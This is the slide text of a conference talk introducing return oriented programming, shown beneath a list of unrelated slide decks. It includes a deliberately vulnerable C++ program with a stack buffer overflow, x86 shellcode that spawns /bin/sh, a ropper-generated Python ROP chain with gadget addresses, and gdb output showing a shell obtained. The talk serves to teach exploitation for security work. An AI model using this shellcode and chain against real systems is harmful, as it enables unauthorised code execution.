 
PDF
898975372-Leaving-Legacy-Software-Behind-a-Modern-Migration-Roadmap.pdf
byKsoft Technologies
 
PDF
Metrics, logs, traces, and mayhem_ introducing an observability adventure gam...
byImma Valls Bernaus
 
PDF
Scraping Amazon Prime Watchlist Data for Viewing Patterns.pdf
byyashpatric
 
PDF
Practical Performance Tuning for Serverless Java on AWS- InfoQ Dev Summit
byVadym Kazulkin
 
PDF
How can AI be used in Content Management Systems, Plone Conference 2025
byRob Gietema
 
PDF
ASTC Conference 2025 - Bridging the Gap!
byGareth Oakes
 
PDF
Austin Marketo User Group: Ground Control 2 MOPS: AI-Ignite your Map
bybbedford2
 
PPTX
Systems Programming Lecture Compute.pptx
byAdekunle25
 
PDF
Dreamforce 2025: Welcome to the Agentic Enterprise
byDele Amefo
 
PDF
VADY GenAI – Enterprise AI Solutions with Complete Data Control and Smart Dec...
byNewFangledVision
 
PDF
The Hidden Cost of Complicated PMO Tools - Using Gartner’s Guidance and OnePl...
byOnePlan Solutions
 
PPT
Lexical and Syntax Analysis top down parsers
bymjmansoori54
 
PDF
SAP & CTRM Testing Like Never Before
byZoe Gilbert
 
PDF
VADY Smart Data Flow – Automated Data Insights for Scalable Enterprise Decisions
byNewFangledVision
 
Safe Confined Space Entry Monitoring_ Singapore Experts.pptx
byprasadexiga0
 
Java Modern Puzzlers, a guide to new programming features
bySimon Ritter
 
Privacy-first in-browser Generative AI web apps: offline-ready, future-proof,...
byMaxim Salnikov
 
VADY Data Analytics Solutions – Effortless AI-Powered Decision-Making for Eve...
byNewFangledVision
 
Safe Confined Space Entry Monitoring_ Singapore Experts.pdf
byprasadexiga0
 
The new Volto Form Block, Plone Conference 2025
byRob Gietema
 
898975372-Leaving-Legacy-Software-Behind-a-Modern-Migration-Roadmap.pdf
byKsoft Technologies
 
Metrics, logs, traces, and mayhem_ introducing an observability adventure gam...
byImma Valls Bernaus
 
Scraping Amazon Prime Watchlist Data for Viewing Patterns.pdf
byyashpatric
 
Practical Performance Tuning for Serverless Java on AWS- InfoQ Dev Summit
byVadym Kazulkin
 
How can AI be used in Content Management Systems, Plone Conference 2025
byRob Gietema
 
ASTC Conference 2025 - Bridging the Gap!
byGareth Oakes
 
Austin Marketo User Group: Ground Control 2 MOPS: AI-Ignite your Map
bybbedford2
 
Systems Programming Lecture Compute.pptx
byAdekunle25
 
Dreamforce 2025: Welcome to the Agentic Enterprise
byDele Amefo
 
VADY GenAI – Enterprise AI Solutions with Complete Data Control and Smart Dec...
byNewFangledVision
 
The Hidden Cost of Complicated PMO Tools - Using Gartner’s Guidance and OnePl...
byOnePlan Solutions
 
Lexical and Syntax Analysis top down parsers
bymjmansoori54
 
SAP & CTRM Testing Like Never Before
byZoe Gilbert
 
VADY Smart Data Flow – Automated Data Insights for Scalable Enterprise Decisions
byNewFangledVision
 

Return Oriented Programming, an introduction

  • 1.
    1 Turtle Sec @pati_gallardo Warning! This presentation hasA LOT of assembly Run while you have the chance
  • 2.
    2 Return Oriented Programming anintroduction NDC Security 2023 Patricia Aas Turtle Sec
  • 3.
    3 @pati_gallardo Patricia Aas -Trainer & Consultant C++ Programmer, Application Security Currently : TurtleSec Previously : Vivaldi, Cisco Systems, Knowit, Opera Software Master in Computer Science Pronouns: she/they Turtle Sec
  • 4.
  • 5.
    5 TurtleSec @pati_gallardo 1. void launch_missiles(intn) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } target.cpp @olvemaudal @pati_gallardo The application
  • 6.
  • 7.
    7 TurtleSec @pati_gallardo target.cpp 1. void launch_missiles(intn) { 2. printf("Launching %d missilesn", n); 3. } 4. 5. void authenticate_and_launch() { 6. int n_missiles = 2; 7. bool allowaccess = false; 8. char response[110]; 9. printf("Secret: "); 10. std::cin >> response; 11. 12. if (strcmp(response, "Joshua") == 0) 13. allowaccess = true; 14. 15. if (allowaccess) { 16. puts("Access granted"); 17. launch_missiles(n_missiles); 18. } 19. 20. if (!allowaccess) 21. puts("Access denied"); 22. } 23. 24. int main() { 25. puts("WarGames MissileLauncher v0.1"); 26. authenticate_and_launch(); 27. puts("Operation complete"); 28. } The vulnerability Stack allocated buffer Stack Buffer Overflow @pati_gallardo
  • 8.
  • 9.
  • 10.
    10 TurtleSec @pati_gallardo Shellcode Piece of code,typically in machine code, that is delivered and executed as a part of an exploit. Called “shellcode” because a traditional use was to start a shell, for example sh. In real exploits it will deliver some kind of mechanism for further (remote) compromise of the system.
  • 11.
    11 TurtleSec @pati_gallardo Shellcode - codethat gives you shell int execve(const char *filename, char *const argv[], char *const envp[]); Target Process Vulnerable Program Target Process /bin/sh Shellcode
  • 12.
    12 TurtleSec @pati_gallardo Write C codefor shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 13.
    13 $ hello TurtleSec 1. #include<fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } Write C code for shellcode TurtleSec shellcode.c execve open close
  • 14.
    14 TurtleSec @pati_gallardo Write C codefor shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 15.
    15 TurtleSec @pati_gallardo $ gcc -Wno-incompatible-pointer-types-m32 -o shellcode shellcode.c $ ./shellcode $ Test C code for shellcode
  • 16.
    16 TurtleSec @pati_gallardo Write C codefor shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 17.
    17 TurtleSec @pati_gallardo ebx eax ax ahal 32 16 8 bx bh bl ecx cx ch cl edx dx dh dl x86 32-bit Linux syscall convention eax Syscall number ebx 1. argument ecx 2. argument edx 3. argument Registers
  • 18.
    18 $ hello TurtleSec 1. #include<fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c close
  • 19.
    19 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2.argument 3. argument 0x06 unsigned int fd close - calling convention 1. int fd = 0; 2. close(fd); Not in use
  • 20.
    20 TurtleSec @pati_gallardo eax Syscall number0x06 ebx 1. argument unsigned int fd close asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 3. "xor ebx, ebxnt" // Zero out ebx - file descriptor 4. "int 0x80nt" // Invoke syscall
  • 21.
    21 TurtleSec @pati_gallardo 1. 2. 3. 4. mov eax, 0x06 xorebx, ebx xor eax, eax eax 0x00 eax 0x06 ebx 0x00 Syscall Registers eax : Syscall number ebx : unsigned int fd int 0x80 close Register State Instructions
  • 22.
    22 $ hello TurtleSec 1. #include<fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c open
  • 23.
    23 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2.argument 3. argument 0x05 const char *filename int flags umode_t mode open - calling convention 1. const char *filename = "/dev/tty"; 2. int flag = O_RDONLY; 3. open(filename, flag);
  • 24.
    24 TurtleSec @pati_gallardo esp sp stack pointer 32 16 Stackmanipulation As instructions like push and pop are executed the stack pointer register (esp) is updated so it points to the "top of the stack"
  • 25.
    25 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2.argument 3. argument 0x05 const char *filename int flags umode_t mode open asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x7974742fnt" // "ytt/" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x7665642fnt" // "ved/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
  • 26.
    26 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x05 xorebx, ebx push ebx mov ebx, 0x7974742f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x7665642f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x79 y 0x74 t 0x74 t 0x2f / 0x76 v 0x65 e 0x64 d 0x2f / ecx 0x00 eax 0x00 eax 0x05 ebx 0x00000000 Stack Syscall Registers edx : umode_t mode eax : Syscall number ebx : const char *filename ecx : int flags int 0x80 ebx 0x7974742f ebx 0x7665642f ebx = esp ecx 0x00 O_RDONLY open
  • 27.
    27 $ hello TurtleSec 1. #include<fcntl.h> 2. #include <unistd.h> 3. 4. int main(void) { 5. int fd = 0; 6. close(fd); 7. const char *filename = "/dev/tty"; 8. int flag = O_RDONLY; 9. open(filename, flag); 10. const char *name = "/bin/sh"; 11. char *const *argv = NULL; 12. char *const *envp = NULL; 13. execve(name, argv, envp); 14. } C code for shellcode TurtleSec shellcode.c execve
  • 28.
    28 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2.argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve - calling convention 1. const char *name = "/bin/sh"; 2. char *const *argv = NULL; 3. char *const *envp = NULL; 4. execve(name, argv, envp);
  • 29.
    29 TurtleSec @pati_gallardo eax ebx edx ecx Syscall number 1. argument 2.argument 3. argument 0x0b const char *name const char *const *argv const char *const *envp execve asm 1. "xor eax, eaxnt" // Zero out 2. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 3. "xor ebx, ebxnt" // Zero out 4. "push ebxnt" // Push null terminator 5. "mov ebx, 0x68732f2fnt" // "hs//" 6. "push ebxnt" // Part two of the string 7. "mov ebx, 0x6e69622fnt" // "nib/" 8. "push ebxnt" // Part one of the string 9. "mov ebx, espnt" // Put pointer in ebx 10. "xor ecx, ecxnt" // Zero out 11. "xor edx, edxnt" // Zero out 12. "int 0x80nt" // Invoke syscall
  • 30.
    30 TurtleSec @pati_gallardo 1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. mov eax, 0x0b xorebx, ebx push ebx mov ebx, 0x68732f2f xor ecx, ecx mov ebx, esp push ebx mov ebx, 0x6e69622f push ebx xor edx, edx xor eax, eax 0x00 0x00 0x00 0x00 0x68 h 0x73 s 0x2f / 0x2f / 0x6e n 0x69 i 0x62 b 0x2f / ecx 0x00 eax 0x00 eax 0x0b ebx 0x00000000 Stack Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv int 0x80 ebx 0x68732f2f ebx 0x6e69622f ebx = esp ecx 0x00 execve
  • 31.
    31 TurtleSec @pati_gallardo Write C codefor shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 32.
    32 TurtleSec @pati_gallardo 1. int main(void){ 2. __asm__( 3. ".intel_syntax noprefixnt" 4. "xor eax, eaxnt" // Zero out 5. "mov eax, 0x06nt" // Set eax to syscall number (0x06) 6. "xor ebx, ebxnt" // Zero out ebx - file descriptor 7. "int 0x80nt" // Invoke syscall 8. "xor eax, eaxnt" // Zero out 9. "mov eax, 0x05nt" // Set eax to syscall number (0x05) 10. "xor ebx, ebxnt" // Zero out 11. "push ebxnt" // Push null terminator 12. "mov ebx, 0x7974742fnt" // "ytt/" 13. "push ebxnt" // Part two of the string 14. "mov ebx, 0x7665642fnt" // "ved/" 15. "push ebxnt" // Part one of the string 16. "mov ebx, espnt" // Put pointer in ebx 17. "xor ecx, ecxnt" // Zero out 18. "xor edx, edxnt" // Zero out 19. "int 0x80nt" // Invoke syscall 20. "xor eax, eaxnt" // Zero out 21. "mov eax, 0x0bnt" // Set eax to syscall number (0x0b) 22. "xor ebx, ebxnt" // Zero out 23. "push ebxnt" // Push null terminator 24. "mov ebx, 0x68732f2fnt" // "hs//" 25. "push ebxnt" // Part two of the string 26. "mov ebx, 0x6e69622fnt" // "nib/" 27. "push ebxnt" // Part one of the string 28. "mov ebx, espnt" // Put pointer in ebx 29. "xor ecx, ecxnt" // Zero out 30. "xor edx, edxnt" // Zero out 31. "int 0x80nt" // Invoke syscall 32. ); 33. } execve open close shellcode_asm.c @pati_gallardo
  • 33.
    33 TurtleSec @pati_gallardo $ clang -m32-o shellcode_asm shellcode_asm.c $ ./shellcode_asm $ Test asm code for shellcode
  • 34.
    34 TurtleSec @pati_gallardo Write C codefor shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 35.
  • 36.
    36 TurtleSec @pati_gallardo Foundational idea: The retinstruction transfers execution to the (return) address located on the stack
  • 37.
    37 TurtleSec @pati_gallardo <addr 1> <addr 1> eax stackptr Stack Registers RX Memory Instruction ptr <addr 1> xor eax, eax; ret; 0x00000000 <addr 2> stack ptr A ret instruction is being executed 1. ret
  • 38.
    38 TurtleSec @pati_gallardo Rest of Rop Chain Returnaddress Stack allocated buffer The Stack Buffer Overflow Gadget 1 addr Gadget 2 addr Gadget 3 addr Gadget 4 addr Gadget 5 addr Gadget 6 addr RX Memory <instructions>; ret; [0] : PADDING [1] : PADDING [2] : PADDING [3] : PADDING [4] : Gadget 1 addr [5] : Gadget 2 addr [6] : Gadget 3 addr [7] : Gadget 4 addr [8] : Gadget 5 addr [9] : Gadget 6 addr <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; <instructions>; ret; Stack at time of overflow
  • 39.
    39 TurtleSec @pati_gallardo Put it allinto the exploit string Padding ROP Chain Gadget 1 Gadget 3 Gadget 2 Gadget 5 Gadget 4 ROP Chain
  • 40.
    40 TurtleSec @pati_gallardo 1. #!/usr/bin/env python2 2.from struct import pack 3. 4. rop = '' 5. rop += 'x90'*130 # Use pattern_create/offset 6. 7. # TODO : Put in ROP chain here 8. 9. print(rop) Print ROP Chain Padding rop_chain.py @pati_gallardo Script
  • 41.
    41 TurtleSec Terminal $ ropper --filetarget --chain execve --badbytes 00090b20 [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] filtering badbytes... 100% [LOAD] removing double gadgets... 100% [INFO] ROPchain Generator for syscall execve: [INFO] write command into data section eax 0xb ebx address to cmd ecx address to null edx address to null [INFO] Try to create chain which fills registers without delete content of previous filled registers [*] Try permuation 1 / 24 [INFO] Look for syscall gadget [INFO] syscall gadget found [INFO] generating rop chain Using ropper to find create a ROP chain
  • 42.
    42 Terminal TurtleSec #!/usr/bin/env python # Generatedby ropper ropchain generator # from struct import pack p = lambda x : pack('I', x) IMAGE_BASE_0 = 0x08048000 # 14e751855dc7dea49f8c9c0e10a22363f36ee225cb9bfee3b663fa039ac8a9ea rebase_0 = lambda x : p(x + IMAGE_BASE_0) rop = '' [... ROP CHAIN ...] print(rop) [INFO] rop chain generated! Using ropper to find create a ROP chain
  • 43.
    43 Terminal TurtleSec rop += rebase_0(0x000ae1aa)# 0x080f61aa: pop eax; ret; rop += '//bi' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca060) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += 'n/sh' rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca064) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000ddf4) # 0x08055df4: xor eax, eax; ret; rop += rebase_0(0x000a2c66) # 0x080eac66: pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += p(0xdeadbeef) rop += rebase_0(0x0001730c) # 0x0805f30c: mov dword ptr [edx], eax; ret; rop += rebase_0(0x0000101e) # 0x0804901e: pop ebx; ret; rop += rebase_0(0x001ca060) rop += rebase_0(0x00004c88) # 0x0804cc88: pop ecx; ret; rop += rebase_0(0x001ca068) rop += rebase_0(0x000f9715) # 0x08141715: pop edx; xor eax, eax; pop edi; ret; rop += rebase_0(0x001ca068) rop += p(0xdeadbeef) rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; rop += p(0xfffffff5) rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; The ROP Chain 1 2 3 4 5 7 6 8 9
  • 44.
    44 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3.0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; ROP chain gadgets pop ebx; ret;
  • 45.
    45 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; popebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca060 0x000a2c66 '//bi' 0x000ae1aa eax ebx edx esi edi ebp stack ptr '//bi' stack ptr 0x001ca060 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c
  • 46.
    46 TurtleSec @pati_gallardo 0x000ae1aa 0x000a2c66 0x0001730c pop edx; popebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; pop eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca064 0x000a2c66 'n/sh' 0x000ae1aa eax ebx edx esi edi ebp stack ptr 'n/sh' stack ptr 0x001ca064 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x000ae1aa 0x000a2c66 0x0001730c 'n/sh'
  • 47.
    47 TurtleSec @pati_gallardo 0x0000ddf4 0x000a2c66 0x0001730c pop edx; popebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; 0x0001730c 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef 0x001ca068 0x000a2c66 0x0000ddf4 eax ebx edx esi edi ebp stack ptr 0x00000000 stack ptr 0x001ca068 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000ddf4 0x000a2c66 0x0001730c 'n/sh' 0x00000000
  • 48.
    48 TurtleSec @pati_gallardo 0x0000101e 0x00004c88 0x000f9715 0x000ae1aa 0x000df9d3 0x000df9d3 0xfffffff5 0x000ae1aa 0xdeadbeef 0x001ca068 0x000f9715 0x001ca068 0x00004c88 0x0000101e eax ebx ecx edx edi stack ptr stack ptr stackptr 0x001ca060 0x001ca064 0x001ca068 '//bi' Stack Registers RW Memory RX Memory Instruction ptr 0x0000101e 0x00004c88 0x000f9715 'n/sh' pop ebx; ret; pop ecx; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; neg eax; ret; 0x001ca068 0x001ca068 0xdeadbeef stack ptr 0x000ae1aa 0xfffffff5 stack ptr 0x000df9d3 0x00000000 0x001ca060 0x0b 0x001ca060
  • 49.
    49 TurtleSec @pati_gallardo 0x00113f80 0x00113f80 eax ebx ecx edx stack ptr 0x001ca060 0x001ca064 0x001ca068 '//bi' StackRegisters RW Memory RX Memory Instruction ptr 0x00113f80 'n/sh' int 0x80; ret; 0x00000000 0x001ca068 0x001ca068 0xfffffff5 0x00000000 0x001ca060 0x0b Syscall Registers edx : const char *const *envp eax : Syscall number ebx : const char *name ecx : const char *const *argv
  • 50.
  • 51.
    51 TurtleSec @pati_gallardo 1. 0x000ae1aa 8. 0x000df9d3 9.0x00113f80 close gadgets pop eax; ret; neg eax; ret; int 0x80; ret; 1. # 1. Zero out ebx 2. # TODO 3. 4. # 2. Put value in eax ( -0xfa = 0x06 ) 5. rop += rebase_0(0x000ae1aa) # 0x080f61aa: pop eax; ret; 6. rop += p(0xfffffffa) 7. 8. # 3. Negate value in eax 9. rop += rebase_0(0x000df9d3) # 0x081279d3: neg eax; ret; 10. 11. # 4. Syscall 12. rop += rebase_0(0x00113f80) # 0x0815bf80: int 0x80; ret; Missing: xor ebx, ebx; ret; Syscall Registers eax : Syscall number ebx : unsigned int fd
  • 52.
    52 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3.0x0001730c 4. 0x08055df4 5. 0x0000101e 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; int 0x80; ret; neg eax; ret; pop eax; ret; open gadgets pop ebx; ret; 1. # 11. Zero out ecx 2. # TODO 3. 4. # 12. Zero out edx 5. # TODO Missing: xor ecx, ecx; ret; Missing: xor edx, edx; ret;
  • 53.
    53 TurtleSec @pati_gallardo 1. 0x000ae1aa 2. 0x000a2c66 3.0x0001730c 4. 0x08055df4 5. 0x0000101e 6. 0x00004c88 7. 0x000f9715 8. 0x000df9d3 9. 0x00113f80 pop edx; pop ebx; pop esi; pop edi; pop ebp; ret; mov dword ptr [edx], eax; ret; xor eax, eax; ret; pop ecx; ret; int 0x80; ret; neg eax; ret; pop edx; xor eax, eax; pop edi; ret; pop eax; ret; execve gadgets (from gen ROP chain) pop ebx; ret;
  • 54.
    54 TurtleSec @pati_gallardo Missing 3 gadgets xorebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret;
  • 55.
    55 Terminal TurtleSec $ ropper --filetarget --search "xor ebx, ebx" [INFO] Load gadgets from cache [LOAD] loading... 100% [LOAD] removing double gadgets... 100% [INFO] Searching for gadgets: xor ebx, ebx [INFO] File: target 0x0811e009: xor ebx, ebx; jmp edx; 0x080ee378: xor ebx, ebx; mov eax, ebx; pop ebx; pop esi; pop edi; ret; 0x0815b675: xor ebx, ebx; mov eax, ecx; int 0x80; 0x080f8a7e: xor ebx, ebx; mov eax, edx; int 0x80; 0x0816abcb: xor ebx, ebx; mov esi, 8; mov dword ptr [esp + 0xc], edx; mov eax, 0xaf; lea ecx, [ecx - 0x5c874]; call dword ptr gs:[0x10]; 0x080b4fce: xor ebx, ebx; movsx eax, al; pop ecx; push eax; push esi; call dword ptr [edx + 8]; 0x08168060: xor ebx, ebx; movzx eax, byte ptr [edi + eax - 0x20]; mov edi, dword ptr [esp + 0xc]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x081680ac: xor ebx, ebx; movzx eax, byte ptr [edx + eax - 0x20]; mov eax, dword ptr [edi + eax*4 - 0x4554]; jmp eax; 0x0807466c: xor ebx, ebx; push eax; push edi; call dword ptr [edx + 8]; 0x080d5b4d: xor ebx, ebx; push ecx; call dword ptr [eax + 0x18]; 0x0808a868: xor ebx, ebx; push edx; push edi; call dword ptr [eax + 0x18]; 0x0804cc9a: xor ebx, ebx; ret;
  • 56.
    56 TurtleSec @pati_gallardo All 3 arepresent in the binary xor ebx, ebx; ret; xor ecx, ecx; ret; xor edx, edx; ret; 0x0804cc9a 0x0804ccad 0x0804ccc0
  • 57.
    57 TurtleSec @pati_gallardo Write C codefor shellcode Test C code Create ROP Chain Test ROP Chain The Plan Write inline assembly Test asm code
  • 58.
    58 $ hello Terminal TurtleSec $ ./rop_chain.py> rop_chain_file $ gdb -q target Reading symbols from target... (gdb) r < rop_chain_file Starting program: target < advanced_ropper_file WarGames MissileLauncher v0.1 Secret: Access granted Launching -1869574000 missiles Access denied process 3279834 is executing new program: /usr/bin/dash [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". $ Test ROP Chain
  • 59.
  • 60.
  • 61.